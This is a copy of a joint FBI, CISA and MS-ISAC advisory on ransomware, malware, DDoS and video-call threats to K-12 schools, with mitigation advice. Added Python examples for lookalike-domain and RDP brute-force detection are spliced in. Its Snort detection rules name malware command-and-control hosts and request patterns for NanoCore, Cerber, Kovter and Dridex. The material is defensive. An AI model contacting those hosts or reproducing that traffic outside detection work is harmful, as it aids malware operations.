- April 13, 2021: Fixed Spelling Error
- April 15, 2021: Updated with Attribution Statement and SUNSHUTTLE MAR

This product is provided subject to this Notification and this Privacy & Use policy.

  • AA20-345A: Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data
    by CISA on 10 December 2020 at 5:00 pm

    Original release date: December 10, 2020

    Summary

    This Joint Cybersecurity Advisory was coauthored by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC). The FBI, CISA, and MS-ISAC assess malicious cyber actors are targeting kindergarten through twelfth grade (K-12) educational institutions, leading to ransomware attacks, the theft of data, and the disruption of distance learning services. Cyber actors likely view schools as targets of opportunity, and these types of attacks are expected to continue through the 2020/2021 academic year. These issues will be particularly challenging for K-12 schools that face resource limitations; therefore, educational leadership, information technology personnel, and security personnel will need to balance this risk when determining their cybersecurity investments.

    Technical Details

    As of December 2020, the FBI, CISA, and MS-ISAC continue to receive reports from K-12 educational institutions about the disruption of distance learning efforts by cyber actors.

    Ransomware

    The FBI, CISA, and MS-ISAC have received numerous reports of ransomware attacks against K-12 educational institutions. In these attacks, malicious cyber actors target school computer systems, slowing access, and—in some instances—rendering the systems inaccessible for basic functions, including distance learning. Adopting tactics previously leveraged against business and industry, ransomware actors have also stolen—and threatened to leak—confidential student data to the public unless institutions pay a ransom. According to MS-ISAC data, the percentage of reported ransomware incidents against K-12 schools increased at the beginning of the 2020 school year.
    In August and September, 57% of ransomware incidents reported to the MS-ISAC involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July. The five most common ransomware variants identified in incidents targeting K-12 schools between January and September 2020, based on open source information as well as victim and third-party incident reports made to MS-ISAC, are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil.

    Malware

    Figure 1 identifies the top 10 malware strains that have affected state, local, tribal, and territorial (SLTT) educational institutions over the past year (up to and including September 2020). Note: these malware variants are purely opportunistic; they affect not only educational institutions but other organizations as well.

    ZeuS and Shlayer are among the most prevalent malware affecting K-12 schools. ZeuS is a Trojan with several variants that targets Microsoft Windows operating systems. Cyber actors use ZeuS to infect target machines and send stolen information to command-and-control servers. Shlayer is a Trojan downloader and dropper for macOS malware. It is primarily distributed through malicious websites, hijacked domains, and malicious advertising posing as a fake Adobe Flash updater. Note: Shlayer is the only malware of the top 10 that targets macOS; the other nine affect Microsoft Windows operating systems.

    Figure 1: Top 10 malware affecting SLTT educational institutions

    Distributed Denial-of-Service Attacks

    Cyber actors are causing disruptions to K-12 educational institutions, including third-party services supporting distance learning, with distributed denial-of-service (DDoS) attacks, which temporarily limit or prevent users from conducting daily operations. The availability of DDoS-for-hire services provides opportunities for any motivated malicious cyber actor to conduct disruptive attacks regardless of experience level.
    Note: DDoS attacks overwhelm servers with a high volume of internet traffic originating from many different sources, making them impossible to mitigate at a single source.

    Video Conference Disruptions

    Numerous reports received by the FBI, CISA, and MS-ISAC since March 2020 indicate that uninvited users have disrupted live video-conferenced classroom sessions. These disruptions have included verbally harassing students and teachers, displaying pornography and/or violent images, and doxing meeting attendees (Note: doxing is the act of compiling or publishing personal information about an individual on the internet, typically with malicious intent). To enter classroom sessions, uninvited users have been observed:
      • Using student names to trick hosts into accepting them into class sessions, and
      • Accessing meetings from either publicly available links or links shared with outside users (e.g., students sharing links and/or passwords with friends).
    Video conference sessions without proper control measures risk disruption or compromise of classroom conversations and exposure of sensitive information.

    Additional Risks and Vulnerabilities

    In addition to the recent reporting of distance learning disruptions received by the FBI, CISA, and MS-ISAC, malicious cyber actors are expected to continue seeking opportunities to exploit the evolving remote learning environment.

    Social Engineering

    Cyber actors could apply social engineering methods against students, parents, faculty, IT personnel, or other individuals involved in distance learning. Tactics such as phishing trick victims into revealing personal information (e.g., password or bank account information) or performing a task (e.g., clicking on a link).
    In such scenarios, a victim could receive what appears to be a legitimate email that:
      • Requests personally identifiable information (PII) (e.g., full name, birthdate, student ID),
      • Directs the user to confirm a password or personal identification number (PIN),
      • Instructs the recipient to visit a website that is compromised by the cyber actor, or
      • Contains an attachment with malware.
    Cyber actors also register web domains that are similar to legitimate websites in an attempt to capture individuals who mistype URLs or click on similar-looking URLs. These types of attacks are referred to as domain spoofing or homograph attacks (the first example below is a typosquat, the second a homoglyph substitution). For example, a user wanting to access www.cottoncandyschool.edu could mistakenly click on www.cottencandyschool.edu (“o” changed to “e”) or www.cottoncandyschoo1.edu (letter “l” changed to the digit “1”). Note: this is a fictitious example to demonstrate how a user can mistakenly click and access a website without noticing subtle changes in website URLs. Victims believe they are on a legitimate website when, in reality, they are visiting a site controlled by a cyber actor.

    Technology Vulnerabilities and Student Data

    Whether as collateral for ransomware attacks or to sell on the dark web, cyber actors may seek to exploit the data-rich environment of student information in schools and education technology (edtech) services. The need for schools to rapidly transition to distance learning likely contributed to cybersecurity gaps, leaving schools vulnerable to attack. In addition, educational institutions that have outsourced their distance learning tools may have lost visibility into data security measures. Cyber actors could view the increased reliance on, and sharp usership growth in, these distance learning services and student data as lucrative targets.
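    As an added example (not part of the advisory), the following Python check flags candidate hostnames that imitate a protected domain in the two ways just described: a one-character typo, and a visually confusable character swapped in. The protected domain is the advisory's own fictitious cottoncandyschool.edu; the homoglyph table, the "www." stripping and the edit-distance threshold of 1 are assumptions chosen for illustration.

```python
"""Lookalike-domain check for the typosquat / homoglyph pattern described above.

Added example, not from the advisory. A candidate hostname is flagged when,
after lower-casing and stripping a leading "www.", it either folds to the same
string as a protected domain once visually confusable characters are
normalised (homoglyph), or sits within edit distance 1 of it (typo).
The homoglyph table and the threshold are assumptions for illustration.
"""
from typing import Dict, Iterable, Optional

# Characters attackers commonly swap for their look-alikes (assumed table).
_SINGLE = str.maketrans({"0": "o", "1": "l", "|": "l", "3": "e", "5": "s", "8": "b"})
_MULTI = (("rn", "m"), ("vv", "w"))


def normalize(host: str) -> str:
    """Lower-case, drop a trailing dot and a leading 'www.' label."""
    host = host.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def fold_homoglyphs(host: str) -> str:
    """Map confusable characters to the letter they imitate."""
    for src, dst in _MULTI:
        host = host.replace(src, dst)
    return host.translate(_SINGLE)


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or
    swap two adjacent characters, each costing 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def check_domain(candidate: str, protected: Iterable[str],
                 max_distance: int = 1) -> Optional[Dict[str, object]]:
    """Return a finding if `candidate` imitates a protected domain, else None."""
    cand = normalize(candidate)
    cand_folded = fold_homoglyphs(cand)
    for legit in protected:
        legit_n = normalize(legit)
        if cand == legit_n:
            return None  # the genuine domain itself, nothing to flag
        if cand_folded == fold_homoglyphs(legit_n):
            return {"target": legit_n, "reason": "homoglyph", "distance": 0}
        dist = edit_distance(cand, legit_n)
        if dist <= max_distance:
            return {"target": legit_n, "reason": "edit-distance", "distance": dist}
    return None


# The advisory's fictitious school domain, used here as the protected list.
PROTECTED = ["cottoncandyschool.edu"]

if __name__ == "__main__":
    for host in ("www.cottoncandyschool.edu", "www.cottencandyschool.edu",
                 "www.cottoncandyschoo1.edu", "www.mathacademy.edu"):
        print(host, "->", check_domain(host, PROTECTED))
```

    Run it over newly registered domains, certificate-transparency feeds, or the sender domains in mail logs; the homoglyph fold is applied to both sides so a protected domain that legitimately contains a digit is compared consistently.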
    Open/Exposed Ports

    The FBI, CISA, and MS-ISAC frequently see malicious cyber actors exploiting exposed Remote Desktop Protocol (RDP) services to gain initial access to a network and, often, to manually deploy ransomware. For example, cyber actors will attack ports 445 (Server Message Block [SMB]) and 3389 (RDP) to gain network access. They are then positioned to move laterally throughout a network (often using SMB), escalate privileges, access and exfiltrate sensitive information, harvest credentials, or deploy a wide variety of malware. This popular attack vector allows cyber actors to maintain a low profile, because they are using a legitimate network service that gives them the same functionality as any other remote user.

    End-of-Life Software

    End-of-life (EOL) software is regularly exploited by cyber actors, often to gain initial access, deface websites, or extend their reach in a network. Once a product reaches EOL, customers no longer receive security updates, technical support, or bug fixes. Unpatched and vulnerable servers are likely to be exploited by cyber actors, hindering an organization’s operational capacity.

    Mitigations

    Plans and Policies

    The FBI and CISA encourage educational providers to maintain business continuity plans, the practice of executing essential functions through emergencies (e.g., cyberattacks), to minimize service interruptions. Without planning, provision, and implementation of continuity principles, institutions may be unable to continue teaching and administrative operations. Evaluating continuity and capability will help identify potential operational gaps. By identifying and addressing these gaps, institutions can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies.
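    The Open/Exposed Ports passage above describes the pattern that RDP log monitoring should catch: many failed logons from one source, then a success. The following Python is an added example, not from the advisory, that detects that sequence in Windows Security events. The events are constructed here in a flat record shape such as a SIEM export might produce (the field names are assumptions); the Windows facts it relies on are event ID 4625 for a failed logon, 4624 for a successful logon, and LogonType 10 for RemoteInteractive (RDP). The threshold and window are assumptions.

```python
"""Flag RDP brute force, and brute force followed by a successful logon, in
Windows Security events.

Added example, not from the advisory. Events are constructed below in the
flat shape a SIEM export might give; the field names are assumptions.
Windows facts used: event 4625 = failed logon, 4624 = successful logon,
LogonType 10 = RemoteInteractive (RDP). Thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RDP_LOGON_TYPE = 10
FAILED, SUCCESS = 4625, 4624


def _ev(hhmm: str, event_id: int, logon_type: int, ip: str, account: str) -> Dict[str, object]:
    """Build one constructed event record (date fixed to the advisory's release day)."""
    t = datetime.strptime(f"2020-12-10 {hhmm}", "%Y-%m-%d %H:%M")
    return {"time": t, "event_id": event_id, "logon_type": logon_type,
            "source_ip": ip, "account": account}


# Constructed sample: one spray-then-success, one spray with no success, one
# user who mistyped twice, and a non-RDP (LogonType 3) failure that must be ignored.
EVENTS: List[Dict[str, object]] = [
    _ev("08:00", FAILED, 10, "203.0.113.44", "administrator"),
    _ev("08:01", FAILED, 10, "203.0.113.44", "admin"),
    _ev("08:02", FAILED, 10, "203.0.113.44", "jsmith"),
    _ev("08:03", FAILED, 10, "203.0.113.44", "jsmith"),
    _ev("08:04", FAILED, 10, "203.0.113.44", "jsmith"),
    _ev("08:05", FAILED, 10, "203.0.113.44", "jsmith"),
    _ev("08:05", FAILED, 3, "203.0.113.44", "jsmith"),   # SMB/network logon, not RDP
    _ev("08:06", SUCCESS, 10, "203.0.113.44", "jsmith"),
    _ev("09:00", FAILED, 10, "192.0.2.77", "administrator"),
    _ev("09:01", FAILED, 10, "192.0.2.77", "administrator"),
    _ev("09:02", FAILED, 10, "192.0.2.77", "root"),
    _ev("09:03", FAILED, 10, "192.0.2.77", "teacher"),
    _ev("09:04", FAILED, 10, "192.0.2.77", "student"),
    _ev("09:05", FAILED, 10, "192.0.2.77", "helpdesk"),
    _ev("09:06", FAILED, 10, "192.0.2.77", "backup"),
    _ev("10:00", FAILED, 10, "198.51.100.9", "mbrown"),
    _ev("10:01", FAILED, 10, "198.51.100.9", "mbrown"),
    _ev("10:02", SUCCESS, 10, "198.51.100.9", "mbrown"),
]


def detect_rdp_abuse(events: List[Dict[str, object]], threshold: int = 5,
                     window: timedelta = timedelta(minutes=10)) -> List[Dict[str, object]]:
    """Return alerts for (a) an RDP success preceded by >= threshold RDP
    failures from the same source within `window`, and (b) sources with
    >= threshold RDP failures and no success at all in the input."""
    failures: Dict[str, List[datetime]] = defaultdict(list)
    alerts: List[Dict[str, object]] = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != RDP_LOGON_TYPE:
            continue  # only RemoteInteractive logons are RDP
        ip = ev["source_ip"]
        if ev["event_id"] == FAILED:
            failures[ip].append(ev["time"])
        elif ev["event_id"] == SUCCESS:
            recent = [t for t in failures[ip] if ev["time"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({"kind": "success-after-bruteforce", "source_ip": ip,
                               "account": ev["account"], "failures": len(recent),
                               "time": ev["time"]})
            failures[ip].clear()  # a success ends the attempt sequence
    flagged = {a["source_ip"] for a in alerts}
    for ip, times in failures.items():
        if ip not in flagged and len(times) >= threshold:
            alerts.append({"kind": "bruteforce-no-success", "source_ip": ip,
                           "failures": len(times)})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_abuse(EVENTS):
        print(alert)
```

    The success-after-failures case is the one that deserves an immediate response (credential reset, session termination, host triage), because it is the point at which the exposed RDP service has become an interactive foothold of the kind the advisory describes.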
    The FBI and CISA suggest K-12 educational institutions review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by cyber actors.

    Network Best Practices
      • Patch operating systems, software, and firmware as soon as manufacturers release updates.
      • Check configurations for every operating system version on institution-owned assets, so that problems do not arise that local users cannot fix because local administration is disabled.
      • Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts.
      • Use multi-factor authentication where possible.
      • Disable unused remote access/RDP ports and monitor remote access/RDP logs.
      • Implement application and remote access allow listing so that systems execute only programs known and permitted by the established security policy.
      • Audit user accounts with administrative privileges and configure access controls with least privilege in mind.
      • Audit logs to ensure new accounts are legitimate.
      • Scan for open or listening ports and remediate those that are not needed.
      • Identify critical assets such as student database servers and distance learning infrastructure; create backups of these systems and keep the backups offline, off the network.
      • Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.
      • Set antivirus and anti-malware solutions to update automatically; conduct regular scans.

    User Awareness Best Practices
      • Focus on awareness and training. Because end users are targeted, make employees and students aware of the threats, such as ransomware and phishing scams, and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.
      • Ensure employees know whom to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This ensures that the established mitigation strategy can be employed quickly and efficiently.
      • Monitor privacy settings and information available on social networking sites.

    Ransomware Best Practices

    The FBI and CISA do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, regardless of whether your organization decided to pay the ransom, the FBI urges you to report ransomware incidents to your local FBI field office. Doing so provides the FBI with the critical information it needs to prevent future attacks by identifying and tracking ransomware attackers and holding them accountable under U.S. law. In addition to implementing the above network best practices, the FBI and CISA also recommend the following:
      • Regularly back up data, air gap, and password protect backup copies offline.
      • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.

    Denial-of-Service Best Practices
      • Consider enrolling in a denial-of-service mitigation service that detects abnormal traffic flows and redirects traffic away from your network.
      • Create a partnership with your local internet service provider (ISP) prior to an event and work with your ISP to control network traffic attacking your network during an event.
      • Configure network firewalls to block unauthorized IP addresses and disable port forwarding.

    Video-Conferencing Best Practices
      • Ensure participants use the most updated version of remote access/meeting applications.
      • Require passwords for session access.
      • Encourage students to avoid sharing passwords or meeting codes.
      • Establish a vetting process to identify participants as they arrive, such as a waiting room.
      • Establish policies to require participants to sign in using true names rather than aliases.
      • Ensure only the host controls screen-sharing privileges.
      • Implement a policy to prevent participants from entering rooms prior to host arrival and to prevent the host from exiting prior to the departure of all participants.

    Edtech Implementation Considerations

    When partnering with third-party and edtech services to support distance learning, educational institutions should consider the following:
      • The service provider’s cybersecurity policies and response plan in the event of a breach, and their remediation practices: How did the service provider resolve past cyber incidents? How did their cybersecurity practices change after these incidents?
      • The provider’s data security practices for their products and services (e.g., data encryption in transit and at rest, security audits, security training of staff, audit logs);
      • The provider’s data maintenance and storage practices (e.g., use of company servers, cloud storage, or third-party services);
      • Types of student data the provider collects and tracks (e.g., PII, academic, disciplinary, medical, biometric, IP addresses);
      • Entities to whom the provider will grant access to the student data (e.g., vendors);
      • How the provider will use student data (e.g., will they sell it to, or share it with, third parties for service enhancement, new product development, studies, marketing/advertising?);
      • The provider’s de-identification practices for student data; and
      • The provider’s policies on data retention and deletion.

    Malware Defense

    Table 1 identifies CISA-created Snort signatures, which have been successfully used to detect and defend against related attacks, for the malware variants listed below. Note: the listing is not fully comprehensive and should not be used to the exclusion of other detection methods.
    Table 1: Malware signatures

    NanoCore
    alert tcp any any -> any $HTTP_PORTS (msg:"NANOCORE:HTTP GET URI contains 'FAD00979338'"; sid:00000000; rev:1; flow:established,to_server; content:"GET"; http_method; content:"getPluginName.php?PluginID=FAD00979338"; fast_pattern; http_uri; classtype:http-uri; metadata:service http;)

    Cerber
    alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|polkiuj.top'"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"host|3a 20|polkiuj.top|0d 0a|"; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)

    Kovter
    alert tcp any any -> any $HTTP_PORTS (msg:"Kovter:HTTP URI POST to CnC Server"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"POST / HTTP/1.1"; depth:15; content:"Content-Type|3a 20|application/x-www-form-urlencoded"; http_header; depth:47; fast_pattern; content:"User-Agent|3a 20|Mozilla/"; http_header; content:!"LOADCURRENCY"; nocase; content:!"Accept"; http_header; content:!"Referer|3a|"; http_header; content:!"Cookie|3a|"; nocase; http_header; pcre:"/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$/P"; pcre:"/User-Agent\x3a[^\r\n]+\r\nHost\x3a\x20(?:\d{1,3}\.){3}\d{1,3}\r\nContent-Length\x3a\x20[1-5][0-9]{2,3}\r\n(?:Cache-Control|Pragma)\x3a[^\r\n]+\r\n(?:\r\n)?$/H"; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:nonstd-tcp; metadata:service http;)

    Dridex
    alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI GET contains 'invoice_########.doc' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; content:"invoice_"; http_uri; fast_pattern:only; content:".doc"; nocase; distance:8; within:4; content:"GET"; nocase; http_method; classtype:http-uri; metadata:service http;)
    alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'Host|3a 20|tanevengledrep ru' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"Host|3a 20|tanevengledrep|2e|ru|0d 0a|"; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)

    Note: the sid:00000000 values and the <unique_ID> flowbit names are placeholders; assign SIDs from your local range and a unique flowbit name before loading the rules.

    Contact Information

    To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.

    Resources

    MS-ISAC membership is open to employees or representatives from all public K-12 education entities in the United States. The MS-ISAC provides multiple cybersecurity services and benefits to help K-12 education entities increase their cybersecurity posture. To join, visit https://learn.cisecurity.org/ms-isac-registration.
      • CISA Telework Guidance and Resources
      • CISA Cybersecurity Recommendations and Tips for Schools Using Video Conferencing
      • CISA Ransomware Publications
      • CISA Emergency Services Sector Continuity Planning Suite
      • CISA-MS-ISAC Joint Ransomware Guide
      • CISA Tip: Avoiding Social Engineering and Phishing Attacks
      • CISA Tip: Understanding Patches
      • CISA and CYBER.ORG “Cyber Safety Video Series” for K-12 students and educators
      • FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations”
    Note: contact your local FBI field office (www.fbi.gov/contact-us/field) for additional FBI products on ransomware, edtech, and cybersecurity for educational institutions.
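    To make the Table 1 rules concrete, the following Python is an added example (not from the advisory, and not a Snort engine) that re-implements each rule's matching logic as a predicate over a parsed HTTP request and runs it against constructed requests. It drops what Snort adds around the match (flowbits, session tagging, port variables) and reduces Kovter's header-order PCRE to the equivalent field checks; the sample requests are constructed for the example, not captures.

```python
"""Python re-implementation of the matching logic in the Table 1 Snort rules.

Added example, not from the advisory and not a Snort engine: no flowbits,
tagging or port variables, and Kovter's header-order PCRE is reduced to the
equivalent field checks. It shows what traffic each rule fires on, against
constructed requests embedded below.
"""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List


@dataclass
class HttpRequest:
    method: str
    uri: str
    headers: Dict[str, str] = field(default_factory=dict)  # names lower-cased
    body: bytes = b""


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.x request into method, URI, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, uri, headers, body)


# NanoCore: http_method "GET" plus the plugin-download URI.
def sig_nanocore(req: HttpRequest) -> bool:
    return req.method == "GET" and "getPluginName.php?PluginID=FAD00979338" in req.uri


# Cerber and the second Dridex rule: exact Host value (the |0d 0a| anchors its end).
def sig_host(expected: str) -> Callable[[HttpRequest], bool]:
    return lambda req: req.headers.get("host") == expected


# Dridex URI: after "invoice_", distance:8 / within:4 means ".doc" must start
# exactly 8 bytes later; ".doc" and the method check are nocase.
DRIDEX_URI = re.compile(r"invoice_.{8}(?i:\.doc)")


def sig_dridex_uri(req: HttpRequest) -> bool:
    return req.method.upper() == "GET" and DRIDEX_URI.search(req.uri) is not None


# Kovter: POST / with form-urlencoded Content-Type, a Mozilla/ User-Agent, a bare
# IPv4 Host, Content-Length 100..59999 ([1-5][0-9]{2,3}), a Cache-Control or Pragma
# header, no Accept/Referer/Cookie, and a body that is one base64 blob (the /P PCRE).
BASE64_BODY = re.compile(rb"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$")
IPV4_HOST = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def sig_kovter(req: HttpRequest) -> bool:
    h = req.headers
    try:
        length = int(h.get("content-length", "0"))
    except ValueError:
        return False
    return (req.method == "POST" and req.uri == "/"
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and h.get("user-agent", "").startswith("Mozilla/")
            and IPV4_HOST.match(h.get("host", "")) is not None
            and 100 <= length <= 59999
            and ("cache-control" in h or "pragma" in h)
            and not any(k in h for k in ("accept", "referer", "cookie"))
            and b"LOADCURRENCY" not in req.body.upper()
            and BASE64_BODY.match(req.body) is not None)


SIGNATURES: Dict[str, Callable[[HttpRequest], bool]] = {
    "NANOCORE": sig_nanocore,
    "CERBER": sig_host("polkiuj.top"),
    "KOVTER": sig_kovter,
    "DRIDEX-URI": sig_dridex_uri,
    "DRIDEX-HOST": sig_host("tanevengledrep.ru"),
}


def match_signatures(raw: bytes) -> List[str]:
    """Names of the Table 1 rules that would fire on this request."""
    req = parse_request(raw)
    return [name for name, pred in SIGNATURES.items() if pred(req)]


# Constructed sample requests (not real captures).
SAMPLE_DRIDEX = b"GET /docs/invoice_20201210.DOC HTTP/1.1\r\nHost: files.example\r\n\r\n"
SAMPLE_DRIDEX_SHORT = b"GET /invoice_123.doc HTTP/1.1\r\nHost: files.example\r\n\r\n"  # only 3 bytes gap
SAMPLE_NANOCORE = b"GET /getPluginName.php?PluginID=FAD00979338 HTTP/1.1\r\nHost: 203.0.113.5\r\n\r\n"
SAMPLE_CERBER = b"GET / HTTP/1.1\r\nHost: polkiuj.top\r\n\r\n"
SAMPLE_KOVTER = (b"POST / HTTP/1.1\r\nHost: 198.51.100.7\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1)\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 120\r\n"
                 b"Cache-Control: no-cache\r\n\r\n" + b"QUFB" * 30)
SAMPLE_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: www.example.edu\r\nAccept: */*\r\n\r\n"

if __name__ == "__main__":
    for name, raw in [("dridex", SAMPLE_DRIDEX), ("dridex-short", SAMPLE_DRIDEX_SHORT),
                      ("nanocore", SAMPLE_NANOCORE), ("cerber", SAMPLE_CERBER),
                      ("kovter", SAMPLE_KOVTER), ("benign", SAMPLE_BENIGN)]:
        print(f"{name:13s} {match_signatures(raw)}")
```

    Two points the emulation makes visible: the Dridex URI rule matches any eight bytes between invoice_ and .doc, not only digits as its msg suggests, and the Cerber rule's content is lower-case host|3a 20| without nocase, so a client that sends Host: with a capital H will not trigger it.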
    Revisions
      • Initial Version: December 10, 2020

    This product is provided subject to this Notification and this Privacy & Use policy.

News (DARKReading, The Hacker News, Threatpost)